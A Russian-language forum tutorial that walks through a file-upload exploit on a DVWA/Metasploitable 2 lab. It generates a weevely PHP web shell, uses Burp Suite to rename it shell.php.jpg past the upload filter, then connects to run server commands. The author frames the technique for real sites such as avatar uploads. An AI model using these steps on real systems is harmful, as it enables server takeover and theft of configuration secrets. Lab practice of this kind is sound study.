✍️ Статья Эксплуатируем продвинутые уязвимости загрузки файлов

The 146X Project Dublikat Web Studio Avram Lincoln AL Service Navigator Knyaz

BlackPope

Команда форума
Модератор DeepWeb ✔️
PR-Group DeepWeb 🔷
Регистрация
27.04.2020
Сообщения
230
Привет!

Нам понадобится:

Kali linux

Metasploitable 2.

Вы должны запустить и перейти на локальный сайт с Metasploitable 2
Metasploitable 2 — нечто вроде боксёрской груши для работы «пентестеров» и использования программ вроде Metasploit и Nmap.
В ней открыты все порты и присутствуют все известные уязвимости, некоторые из которых вы можете встретить в реальной жизни на настоящих системах.

Что мы с можем сделать когда взломаем сайт и где это можно делать.
Можно это сделать например при загрузки аватарки или на тематическом сайте по продаже авто.
Мы можем выполнять команды сервера например "ls, less config.php"

Ну что приступим!

1. ставим высокий уровень защиты в DVWA

RYSU2VJ7ki8.jpg


2. мы должны перейти во вкладку «Upload»

VfWQbmJwSGQ.jpg


3. Создаём shell с помощью weevely

weevely generate пароль имяфайла.php

RTG0Znd-Da4.jpg


ну конечно мы так не сможет загрузить файл с php на сайт,поэтому нам нужен burp suite


3.Открываем burp suite


4. Нужно настроить что бы burp перехватывал все пакеты

Открыть шторку с дополнительными инструментами и перейти к настройкам браузера.

N36yH_PkW6E.jpg


В настройках, выбрать пункт «Настройка прокси».

Нажать на соответствующий чекбокс.

waGGAILtJc0.jpg


в burp выставляем тоже самое

C-LX1P4JNP8.jpg


5. Переходим обратно в DVWA на upload

Нажимаем browse что бы загрузить наш файл

Но перед этим его нужно переименовать как jpg т.е shell.jpg



6. Нажимаем upload и заходим в burp видим что он перехватил(у страницы будет бесконечная загрузка)

Переходим в Proxy > Intercept

И добавляем расширение файл будет называться shell.php.jpg

_aRXyAqeN5A.jpg


И видим что у нас всё получилось

4bMZgz7mwcQ.jpg


Можем проверить по пути http://192.168.56.103/dvwa/hackable/uploads/shell.php.jpg если нет ошибки то всё хорошо и доступ есть

7. Идём в терминал и пишем команду

weevely http://192.168.56.103/dvwa/hackable/uploads/shell.php.jpg 123456

Xg7ZTw7KWp0.jpg


И после этого всего может исполнять команды сервера

iAMduoy9zqM.jpg


Готово!

Чтобы сёрфить нужно выключить прокси, burp как хотите можете закрыть можете оставить)

3fqKxSTqlO8.jpg
 

📌 Золотая реклама

AnonPaste

Верх